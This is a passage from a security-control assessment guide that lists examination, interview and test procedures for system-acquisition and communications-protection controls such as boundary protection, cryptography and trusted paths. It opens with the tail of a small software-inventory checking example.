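        print(f"{name:12} {verdict:10} {reason}")
```

Two packages come back prohibited on the constructed inventory, one for its licence and one for having no identifiable publisher, while the new browser from a trusted publisher is neither allowed nor blocked by the rules alone and is routed to whoever holds the approval records; that split is the point of the (M) (H) interview above.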


ASSESSMENT PROCEDURE
SA-8 SECURITY ENGINEERING PRINCIPLES
Control: The organization designs and implements the information system using security engineering principles.
Supplemental Guidance: NIST Special Publication 800-27 provides guidance on engineering principles for information system security. The application of security engineering principles is primarily targeted at new development information systems or systems undergoing major upgrades and is integrated into the system development life cycle. For legacy information systems, the organization applies security engineering principles to system upgrades and modifications, to the extent feasible, given the current state of the hardware, software, and firmware components within the system.
SA-8.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization designs and implements the information system using security engineering principles; and
(ii) the organization considers the security design principles in NIST Special Publication 800-27 in the design, development, and implementation of the information system.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and services acquisition policy; procedures addressing security engineering principles used in the development and implementation of the information system; NIST Special Publication 800-27; information system design documentation; security requirements and security specifications for the information system; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Organizational personnel with system and services acquisition responsibilities]. (M) (H)


ASSESSMENT PROCEDURE
SA-9 EXTERNAL INFORMATION SYSTEM SERVICES
Control: The organization: (i) requires that providers of external information system services employ adequate security controls in accordance with applicable laws, Executive Orders, directives, policies, regulations, standards, guidance, and established service-level agreements; and (ii) monitors security control compliance.
Supplemental Guidance: An external information system service is a service that is implemented outside of the accreditation boundary of the organizational information system (i.e., a service that is used by, but not a part of, the organizational information system). Relationships with external service providers are established in a variety of ways, for example, through joint ventures, business partnerships, outsourcing arrangements (i.e., through contracts, interagency agreements, lines of business arrangements), licensing agreements, and/or supply chain exchanges. Ultimately, the responsibility for adequately mitigating risks to the organization's operations and assets, and to individuals, arising from the use of external information system services remains with the authorizing official. Authorizing officials must require that an appropriate chain of trust be established with external service providers when dealing with the many issues associated with information system security. For services external to the organization, a chain of trust requires that the organization establish and retain a level of confidence that each participating service provider in the potentially complex consumer-provider relationship provides adequate protection for the services rendered to the organization. Where a sufficient level of trust cannot be established in the external services and/or service providers, the organization employs compensating security controls or accepts the greater degree of risk to its operations and assets, or to individuals. The external information system services documentation includes government, service provider, and end user security roles and responsibilities, and any service-level agreements. Service-level agreements define the expectations of performance for each required security control, describe measurable outcomes, and identify remedies and response requirements for any identified instance of non-compliance.
NIST Special Publication 800-35 provides guidance on information technology security services. NIST Special Publication 800-64 provides guidance on the security considerations in the system development life cycle.
SA-9.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization requires that providers of external information system services employ adequate security controls in accordance with applicable laws, Executive Orders, directives, policies, regulations, standards, guidance, and established service-level agreements; and
(ii) the organization monitors security control compliance.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and services acquisition policy; procedures addressing external information system services; acquisition contracts and service level agreements; organizational security requirements and security specifications for external provider services; security control assessment evidence from external providers of information system services; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with system and services acquisition responsibilities; external providers of information system services]. (H)


ASSESSMENT PROCEDURE
SA-10 DEVELOPER CONFIGURATION MANAGEMENT
Control: The organization requires that information system developers create and implement a configuration management plan that controls changes to the system during development, tracks security flaws, requires authorization of changes, and provides documentation of the plan and its implementation.
Supplemental Guidance: This control also applies to the development actions associated with information system changes.
SA-10.1 ASSESSMENT OBJECTIVE:
Determine if the organization requires that information system developers create and implement a configuration management plan that controls changes to the system during development, tracks security flaws, requires authorization of changes, and provides documentation of the plan and its implementation.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and services acquisition policy; procedures addressing information system developer/integrator configuration management; acquisition contracts and service level agreements; information system developer/integrator configuration management plan; security flaw tracking records; system change authorization records; other relevant documents or records]. (H)


ASSESSMENT PROCEDURE
SA-11 DEVELOPER SECURITY TESTING
Control: The organization requires that information system developers create a security test and evaluation plan, implement the plan, and document the results.
Supplemental Guidance: Developmental security test results are used to the greatest extent feasible after verification of the results and recognizing that these results are impacted whenever there have been security relevant modifications to the information system subsequent to developer testing. Test results may be used in support of the security certification and accreditation process for the delivered information system. Related security controls: CA-2, CA-4.
SA-11.1 ASSESSMENT OBJECTIVE:
Determine if the organization requires that information system developers (and systems integrators) create a security test and evaluation plan, implement the plan, and document the results.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and services acquisition policy; procedures addressing information system developer/integrator security testing; acquisition contracts and service level agreements; information system developer/integrator security test plans; records of developer/integrator security testing results for the information system; other relevant documents or records]. (M) (H)


FAMILY:

System and Communications Protection


ASSESSMENT PROCEDURE
SC-1 SYSTEM AND COMMUNICATIONS PROTECTION POLICY AND PROCEDURES
Control: The organization develops, disseminates, and periodically reviews/updates: (i) a formal, documented, system and communications protection policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and (ii) formal, documented procedures to facilitate the implementation of the system and communications protection policy and associated system and communications protection controls.
Supplemental Guidance: The system and communications protection policy and procedures are consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. The system and communications protection policy can be included as part of the general information security policy for the organization. System and communications protection procedures can be developed for the security program in general, and for a particular information system, when required. NIST Special Publication 800-12 provides guidance on security policies and procedures.
SC-1.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization develops and documents system and communications protection policy and procedures;
(ii) the organization disseminates system and communications protection policy and procedures to appropriate elements within the organization;
(iii) responsible parties within the organization periodically review system and communications protection policy and procedures; and
(iv) the organization updates system and communications protection policy and procedures when organizational review indicates updates are required.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy and procedures; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with system and communications protection responsibilities]. (H)
SC-1.2 ASSESSMENT OBJECTIVE:
Determine if:
(i) the system and communications protection policy addresses purpose, scope, roles and responsibilities, management commitment, coordination among organizational entities, and compliance;
(ii) the system and communications protection policy is consistent with the organization's mission and functions and with applicable laws, directives, policies, regulations, standards, and guidance; and
(iii) the system and communications protection procedures address all areas identified in the system and communications protection policy and address achieving policy-compliant implementations of all associated system and communications protection controls.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy and procedures; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with system and communications protection responsibilities]. (H)


ASSESSMENT PROCEDURE
SC-2 APPLICATION PARTITIONING
Control: The information system separates user functionality (including user interface services) from information system management functionality.
Supplemental Guidance: The information system physically or logically separates user interface services (e.g., public web pages) from information storage and management services (e.g., database management). Separation may be accomplished through the use of different computers, different central processing units, different instances of the operating system, different network addresses, combinations of these methods, or other methods as appropriate.
SC-2.1 ASSESSMENT OBJECTIVE:
Determine if the information system separates user functionality (including user interface services) from information system management functionality.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing application partitioning; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H)
Test: [SELECT FROM: Separation of user functionality from information system management functionality]. (H)


ASSESSMENT PROCEDURE
SC-3 SECURITY FUNCTION ISOLATION
Control: The information system isolates security functions from nonsecurity functions.
Supplemental Guidance: The information system isolates security functions from nonsecurity functions by means of partitions, domains, etc., including control of access to and integrity of, the hardware, software, and firmware that perform those security functions. The information system maintains a separate execution domain (e.g., address space) for each executing process.
SC-3.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines the security functions of the information system to be isolated from nonsecurity functions; and
(ii) the information system isolates security functions from nonsecurity functions.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing security function isolation; list of security functions to be isolated from nonsecurity functions; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (H)
Test: [SELECT FROM: Separation of security functions from nonsecurity functions within the information system]. (H)
SC-3(1) SECURITY FUNCTION ISOLATION
Control Enhancement:
The information system employs underlying hardware separation mechanisms to facilitate security function isolation.
SC-3(1).1 ASSESSMENT OBJECTIVE:
Determine if the information system employs underlying hardware separation mechanisms to facilitate security function isolation.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing security function isolation; information system design documentation; hardware separation mechanisms; information system configuration settings and associated documentation; other relevant documents or records].
Test: [SELECT FROM: Hardware separation mechanisms facilitating security function isolation].
SC-3(2) SECURITY FUNCTION ISOLATION
Control Enhancement:
The information system isolates critical security functions (i.e., functions enforcing access and information flow control) from both nonsecurity functions and from other security functions.
SC-3(2).1 ASSESSMENT OBJECTIVE:
Determine if the information system isolates security functions enforcing access and information flow control from both nonsecurity functions and from other security functions.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing security function isolation; list of critical security functions; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records].
Test: [SELECT FROM: Isolation of critical security functions].
SC-3(3) SECURITY FUNCTION ISOLATION
Control Enhancement:
The information system minimizes the number of nonsecurity functions included within the isolation boundary containing security functions.
SC-3(3).1 ASSESSMENT OBJECTIVE:
Determine if the information system minimizes the number of nonsecurity functions included within the isolation boundary containing security functions.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing security function isolation; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records].
SC-3(4) SECURITY FUNCTION ISOLATION
Control Enhancement:
The information system security functions are implemented as largely independent modules that avoid unnecessary interactions between modules.
SC-3(4).1 ASSESSMENT OBJECTIVE:
Determine if the information system security functions are implemented as largely independent modules that avoid unnecessary interactions between modules.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing security function isolation; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records].
SC-3(5) SECURITY FUNCTION ISOLATION
Control Enhancement:
The information system security functions are implemented as a layered structure minimizing interactions between layers of the design and avoiding any dependence by lower layers on the functionality or correctness of higher layers.
SC-3(5).1 ASSESSMENT OBJECTIVE:
Determine if the information system security functions are implemented as a layered structure minimizing interactions between layers of the design and avoiding any dependence by lower layers on the functionality or correctness of higher layers.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing security function isolation; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records].


ASSESSMENT PROCEDURE
SC-4 INFORMATION REMNANCE
Control: The information system prevents unauthorized and unintended information transfer via shared system resources.
Supplemental Guidance: Control of information system remnance, sometimes referred to as object reuse, or data remnance, prevents information, including encrypted representations of information, produced by the actions of a prior user/role (or the actions of a process acting on behalf of a prior user/role) from being available to any current user/role (or current process) that obtains access to a shared system resource (e.g., registers, main memory, secondary storage) after that resource has been released back to the information system.
SC-4.1 ASSESSMENT OBJECTIVE:
Determine if the information system prevents unauthorized and unintended information transfer via shared system resources.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing information remnance; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H)
Test: [SELECT FROM: Information system for unauthorized and unintended transfer of information via shared system resources]. (H)


ASSESSMENT PROCEDURE
SC-5 DENIAL OF SERVICE PROTECTION
Control: The information system protects against or limits the effects of the following types of denial of service attacks: [Assignment: organization-defined list of types of denial of service attacks or reference to source for current list].
Supplemental Guidance: A variety of technologies exist to limit, or in some cases, eliminate the effects of denial of service attacks. For example, boundary protection devices can filter certain types of packets to protect devices on an organization's internal network from being directly affected by denial of service attacks. Information systems that are publicly accessible can be protected by employing increased capacity and bandwidth combined with service redundancy.
SC-5.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines in the security plan, explicitly or by reference, the types of denial of service attacks (or provides references to sources of current denial of service attacks) that can be addressed by the information system; and
(ii) the information system protects against or limits the effects of the organization-defined or referenced types of denial of service attacks.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing denial of service protection; information system design documentation; security plan; information system configuration settings and associated documentation; other relevant documents or records]. (L) (M) (H)
Test: [SELECT FROM: Information system for protection against or limitation of the effects of denial of service attacks]. (M) (H)
SC-5(1) DENIAL OF SERVICE PROTECTION
Control Enhancement:
The information system restricts the ability of users to launch denial of service attacks against other information systems or networks.
SC-5(1).1 ASSESSMENT OBJECTIVE:
Determine if the information system restricts the ability of users to launch denial of service attacks against other information systems or networks.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing denial of service protection; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records].
Test: [SELECT FROM: Information system for protection against or limitation of the effects of denial of service attacks].
SC-5(2) DENIAL OF SERVICE PROTECTION
Control Enhancement:
The information system manages excess capacity, bandwidth, or other redundancy to limit the effects of information flooding types of denial of service attacks.
SC-5(2).1 ASSESSMENT OBJECTIVE:
Determine if the information system manages excess capacity, bandwidth, or other redundancy to limit the effects of information flooding types of denial of service attacks.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing denial of service protection; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records].
Test: [SELECT FROM: Automated mechanisms implementing information system bandwidth, capacity, and redundancy management].


ASSESSMENT PROCEDURE
SC-6 RESOURCE PRIORITY
Control: The information system limits the use of resources by priority.
Supplemental Guidance: Priority protection helps prevent a lower-priority process from delaying or interfering with the information system servicing any higher-priority process.
SC-6.1 ASSESSMENT OBJECTIVE:
Determine if the information system limits the use of resources by priority.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing prioritization of information system resources; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records].
Test: [SELECT FROM: Automated mechanisms implementing resource allocation capability].


ASSESSMENT PROCEDURE
SC-7 BOUNDARY PROTECTION
Control: The information system monitors and controls communications at the external boundary of the information system and at key internal boundaries within the system.
Supplemental Guidance: Any connections to the Internet, or other external networks or information systems, occur through managed interfaces consisting of appropriate boundary protection devices (e.g., proxies, gateways, routers, firewalls, guards, encrypted tunnels) arranged in an effective architecture (e.g., routers protecting firewalls and application gateways residing on a protected subnetwork commonly referred to as a demilitarized zone or DMZ). Information system boundary protections at any designated alternate processing sites provide the same levels of protection as that of the primary site.

As part of a defense-in-depth protection strategy, the organization considers partitioning higher-impact information systems into separate physical domains (or environments) and applying the concepts of managed interfaces described above to restrict or prohibit network access in accordance with an organizational assessment of risk. FIPS 199 security categorization guides the selection of appropriate candidates for domain partitioning.

The organization carefully considers the intrinsically shared nature of commercial telecommunications services in the implementation of security controls associated with the use of such services. Commercial telecommunications services are commonly based on network components and consolidated management systems shared by all attached commercial customers, and may include third party provided access lines and other service elements. Consequently, such interconnecting transmission services may represent sources of increased risk despite contract security provisions. Therefore, when this situation occurs, the organization either implements appropriate compensating security controls or explicitly accepts the additional risk. NIST Special Publication 800-77 provides guidance on virtual private networks. Related security controls: MP-4, RA-2.

SC-7.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines key internal boundaries of the information system; and
(ii) the information system monitors and controls communications at the external boundary of the information system and at key internal boundaries within the system.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing boundary protection; list of key internal boundaries of the information system; information system design documentation; boundary protection hardware and software; information system configuration settings and associated documentation; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Selected organizational personnel with boundary protection responsibilities]. (M) (H)
Test: [SELECT FROM: Automated mechanisms implementing boundary protection capability within the information system]. (H)
SC-7(1) BOUNDARY PROTECTION
Control Enhancement:
The organization physically allocates publicly accessible information system components to separate subnetworks with separate, physical network interfaces.
Enhancement Supplemental Guidance: Publicly accessible information system components include, for example, public web servers.
SC-7(1).1 ASSESSMENT OBJECTIVE:
Determine if the organization physically allocates publicly accessible information system components to separate subnetworks with separate, physical network interfaces.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing boundary protection; information system design documentation; information system hardware and software; information system architecture; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H)
SC-7(2) BOUNDARY PROTECTION
Control Enhancement:
The organization prevents public access into the organization's internal networks except as appropriately mediated.
SC-7(2).1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines the mediation necessary for public access to the organization's internal networks; and
(ii) the organization prevents public access into the organization's internal networks except as appropriately mediated.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing boundary protection; list of mediation vehicles for allowing public access to the organization's internal networks; information system design documentation; boundary protection hardware and software; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H)
Test: [SELECT FROM: Automated mechanisms implementing access controls for public access to the organization's internal networks]. (H)
SC-7(3) BOUNDARY PROTECTION
Control Enhancement:
The organization limits the number of access points to the information system to allow for better monitoring of inbound and outbound network traffic.
SC-7(3).1 ASSESSMENT OBJECTIVE:
Determine if the organization limits the number of access points to the information system to allow for better monitoring of inbound and outbound network traffic.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing boundary protection; information system design documentation; boundary protection hardware and software; information system architecture and configuration documentation; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H)
SC-7(4) BOUNDARY PROTECTION
Control Enhancement:
The organization implements a managed interface (boundary protection devices in an effective security architecture) with any external telecommunication service, implementing controls appropriate to the required protection of the confidentiality and integrity of the information being transmitted.
SC-7(4).1 ASSESSMENT OBJECTIVE:
Determine if the organization implements a managed interface (boundary protection devices in an effective security architecture) with any external telecommunication service, implementing controls appropriate to the required protection of the confidentiality and integrity of the information being transmitted.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing boundary protection; information system security architecture; information system design documentation; boundary protection hardware and software; information system architecture and configuration documentation; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Selected organizational personnel with boundary protection responsibilities]. (H)
SC-7(5) BOUNDARY PROTECTION
Control Enhancement:
The information system denies network traffic by default and allows network traffic by exception (i.e., deny all, permit by exception).
SC-7(5).1 ASSESSMENT OBJECTIVE:
Determine if the information system denies network traffic by default and allows network traffic by exception.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing boundary protection; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Selected organizational personnel with boundary protection responsibilities]. (H)
SC-7(6) BOUNDARY PROTECTION
Control Enhancement:
The organization prevents the unauthorized release of information outside of the information system boundary or any unauthorized communication through the information system boundary when there is an operational failure of the boundary protection mechanisms.
SC-7(6).1 ASSESSMENT OBJECTIVE:
Determine if the organization prevents the unauthorized release of information outside of the information system boundary or any unauthorized communication through the information system boundary when there is an operational failure of the boundary protection mechanisms.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing boundary protection; information system design documentation; information system configuration settings and associated documentation; information system audit records; other relevant documents or records]. (H)
Test: [SELECT FROM: Automated mechanisms supporting the fail-safe boundary protection capability within the information system]. (H)


ASSESSMENT PROCEDURE
SC-8 TRANSMISSION INTEGRITY
Control: The information system protects the integrity of transmitted information.
Supplemental Guidance: If the organization is relying on a commercial service provider for transmission services as a commodity item rather than a fully dedicated service, it may be more difficult to obtain the necessary assurances regarding the implementation of needed security controls for transmission integrity. When it is infeasible or impractical to obtain the necessary security controls and assurances of control effectiveness through appropriate contracting vehicles, the organization either implements appropriate compensating security controls or explicitly accepts the additional risk. NIST Special Publication 800-52 provides guidance on protecting transmission integrity using Transport Layer Security (TLS). NIST Special Publication 800-77 provides guidance on protecting transmission integrity using IPsec. NIST Special Publication 800-81 provides guidance on Domain Name System (DNS) message authentication and integrity verification. NSTISSI No. 7003 contains guidance on the use of Protective Distribution Systems.
SC-8.1 ASSESSMENT OBJECTIVE:
Determine if the information system protects the integrity of transmitted information.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing transmission integrity; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H)
Test: [SELECT FROM: Transmission integrity capability within the information system]. (H)
SC-8(1) TRANSMISSION INTEGRITY
Control Enhancement:
The organization employs cryptographic mechanisms to recognize changes to information during transmission unless otherwise protected by alternative physical measures.
Enhancement Supplemental Guidance: Alternative physical protection measures include, for example, protected distribution systems.
SC-8(1).1 ASSESSMENT OBJECTIVE:
Determine if the information system employs cryptographic mechanisms to recognize changes to information during transmission unless otherwise protected by alternative physical measures.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing transmission integrity; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (H)
Test: [SELECT FROM: Cryptographic mechanisms implementing transmission integrity capability within the information system]. (H)


ASSESSMENT PROCEDURE
SC-9 TRANSMISSION CONFIDENTIALITY
Control: The information system protects the confidentiality of transmitted information.
Supplemental Guidance: If the organization is relying on a commercial service provider for transmission services as a commodity item rather than a fully dedicated service, it may be more difficult to obtain the necessary assurances regarding the implementation of needed security controls for transmission confidentiality. When it is infeasible or impractical to obtain the necessary security controls and assurances of control effectiveness through appropriate contracting vehicles, the organization either implements appropriate compensating security controls or explicitly accepts the additional risk. NIST Special Publication 800-52 provides guidance on protecting transmission confidentiality using Transport Layer Security (TLS). NIST Special Publication 800-77 provides guidance on protecting transmission confidentiality using IPsec. NSTISSI No. 7003 contains guidance on the use of Protective Distribution Systems. Related security control: AC-17.
SC-9.1 ASSESSMENT OBJECTIVE:
Determine if the information system protects the confidentiality of transmitted information.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing transmission confidentiality; information system design documentation; contracts for telecommunications services; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H)
Test: [SELECT FROM: Transmission confidentiality capability within the information system]. (H)
SC-9(1) TRANSMISSION CONFIDENTIALITY
Control Enhancement:
The organization employs cryptographic mechanisms to prevent unauthorized disclosure of information during transmission unless otherwise protected by alternative physical measures.
Enhancement Supplemental Guidance: Alternative physical protection measures include, for example, protected distribution systems.
SC-9(1).1 ASSESSMENT OBJECTIVE:
Determine if the information system employs cryptographic mechanisms to prevent unauthorized disclosure of information during transmission unless otherwise protected by alternative physical measures.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing transmission confidentiality; information system design documentation; information system communications hardware and software or Protected Distribution System protection mechanisms; information system configuration settings and associated documentation; other relevant documents or records]. (H)
Test: [SELECT FROM: Cryptographic mechanisms implementing transmission confidentiality capability within the information system]. (H)


ASSESSMENT PROCEDURE
SC-10 NETWORK DISCONNECT
Control: The information system terminates a network connection at the end of a session or after [Assignment: organization-defined time period] of inactivity.
Supplemental Guidance: The organization applies this control within the context of risk management that considers specific mission or operational requirements.
SC-10.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines in the security plan, explicitly or by reference, the time period of inactivity before the information system terminates a network connection; and
(ii) the information system terminates a network connection at the end of a session or after the organization-defined time period of inactivity.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing network disconnect; information system design documentation; organization-defined time period of inactivity before network disconnect; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H)
Test: [SELECT FROM: Network disconnect capability within the information system]. (M) (H)


ASSESSMENT PROCEDURE
SC-11 TRUSTED PATH
Control: The information system establishes a trusted communications path between the user and the following security functions of the system: [Assignment: organization-defined security functions to include at a minimum, information system authentication and reauthentication].
Supplemental Guidance: A trusted path is employed for high-confidence connections between the security functions of the information system and the user (e.g., for login).
SC-11.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines in the security plan, explicitly or by reference, the security functions within the information system that are included in a trusted communications path;
(ii) the organization-defined security functions include information system authentication and reauthentication; and
(iii) the information system establishes a trusted communications path between the user and the organization-defined security functions within the information system.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing trusted communications paths; security plan; information system design documentation; information system configuration settings and associated documentation; assessment results from independent, testing organizations; other relevant documents or records].
Test: [SELECT FROM: Automated mechanisms implementing trusted communications paths within the information system].


ASSESSMENT PROCEDURE
SC-12 CRYPTOGRAPHIC KEY ESTABLISHMENT AND MANAGEMENT
Control: When cryptography is required and employed within the information system, the organization establishes and manages cryptographic keys using automated mechanisms with supporting procedures or manual procedures.
Supplemental Guidance: NIST Special Publication 800-56 provides guidance on cryptographic key establishment. NIST Special Publication 800-57 provides guidance on cryptographic key management.
SC-12.1 ASSESSMENT OBJECTIVE:
Determine if the organization establishes and manages cryptographic keys using automated mechanisms with supporting procedures or manual procedures, when cryptography is required and employed within the information system.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing cryptographic key management and establishment; NIST Special Publications 800-56 and 800-57; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Organizational personnel with responsibilities for cryptographic key establishment or management]. (H)
Test: [SELECT FROM: Automated mechanisms implementing cryptographic key management and establishment within the information system]. (H)


ASSESSMENT PROCEDURE
SC-13 USE OF CRYPTOGRAPHY
Control: For information requiring cryptographic protection, the information system implements cryptographic mechanisms that comply with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance.
Supplemental Guidance: The applicable federal standard for employing cryptography in nonnational security information systems is FIPS 140-2 (as amended). Validation certificates issued by the NIST Cryptographic Module Validation Program (including FIPS 140-1, FIPS 140-2, and future amendments) remain in effect and the modules remain available for continued use and purchase until a validation certificate is specifically revoked. NIST Special Publications 800-56 and 800-57 provide guidance on cryptographic key establishment and cryptographic key management. Additional information on the use of validated cryptography is available at http://csrc.nist.gov/cryptval.
SC-13.1 ASSESSMENT OBJECTIVE:
Determine if, for information requiring cryptographic protection, the information system implements cryptographic mechanisms that comply with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing use of cryptography; FIPS 140-2 (as amended); NIST Special Publications 800-56 and 800-57; information system design documentation; information system configuration settings and associated documentation; cryptographic module validation certificates; other relevant documents or records]. (L) (M) (H)


ASSESSMENT PROCEDURE
SC-14 PUBLIC ACCESS PROTECTIONS
Control: The information system protects the integrity and availability of publicly available information and applications.
Supplemental Guidance: None.
SC-14.1 ASSESSMENT OBJECTIVE:
Determine if the information system protects the integrity and availability of publicly available information and applications.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing public access protections; access control policy and procedures; boundary protection procedures; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (L) (M) (H)
Test: [SELECT FROM: Automated mechanisms protecting the integrity and availability of publicly available information and applications within the information system]. (H)


ASSESSMENT PROCEDURE
SC-15 COLLABORATIVE COMPUTING
Control: The information system prohibits remote activation of collaborative computing mechanisms and provides an explicit indication of use to the local users.
Supplemental Guidance: Collaborative computing mechanisms include, for example, video and audio conferencing capabilities. Explicit indication of use includes, for example, signals to local users when cameras and/or microphones are activated.
SC-15.1 ASSESSMENT OBJECTIVE:
Determine if the information system prohibits remote activation of collaborative computing mechanisms and provides an explicit indication of use to the local users.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing collaborative computing; access control policy and procedures; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H)
Test: [SELECT FROM: Automated mechanisms implementing access controls for collaborative computing environments; alert notification for local users]. (H)
SC-15(1) COLLABORATIVE COMPUTING
Control Enhancement:
The information system provides physical disconnect of camera and microphone in a manner that supports ease of use.
SC-15(1).1 ASSESSMENT OBJECTIVE:
Determine if the information system provides physical disconnect of camera and microphone in a manner that supports ease of use.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing collaborative computing; access control policy and procedures; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records].
Test: [SELECT FROM: Physical disconnect of collaborative computing devices].


ASSESSMENT PROCEDURE
SC-16 TRANSMISSION OF SECURITY PARAMETERS
Control: The information system reliably associates security parameters with information exchanged between information systems.
Supplemental Guidance: Security parameters include, for example, security labels and markings. Security parameters may be explicitly or implicitly associated with the information contained within the information system.
SC-16.1 ASSESSMENT OBJECTIVE:
Determine if the information system reliably associates security parameters with information exchanged between information systems.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and communications protection policy; procedures addressing transmission of security parameters; access control policy and procedures; boundary protection procedures; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records].
Test: [SELECT FROM: Automated mechanisms supporting reliable transmission of security parameters between information systems].


ASSESSMENT PROCEDURE
SC-17 PUBLIC KEY INFRASTRUCTURE CERTIFICATES
Control: The organization issues public key certificates under an appropriate certificate policy or obtains public key certificates under an appropriate certificate policy from an approved service provider.
